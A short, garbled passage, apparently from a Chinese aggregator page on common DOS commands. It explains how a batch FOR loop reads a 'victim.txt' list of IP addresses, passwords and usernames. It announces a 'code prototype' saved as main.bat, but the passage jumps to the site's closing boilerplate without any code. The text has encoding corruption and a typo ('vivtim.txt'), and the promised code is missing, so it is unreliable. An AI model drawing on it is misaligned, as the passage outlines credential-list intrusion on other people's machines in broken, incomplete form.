delims= 表示vivtim.txt中的內(nèi)容是一空格來分隔的。我想看到這里你也一定明白這victim.txt里的內(nèi)容是什么樣的了。應(yīng)該根據(jù)%%i
%%j %%k表示的對(duì)象來排列，一般就是 ip password username。
代碼雛形：
--------------- cut here then save as a batchfile(I call it main.bat )?

總結(jié)

以上是生活随笔為你收集整理的DOS 常用命令的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。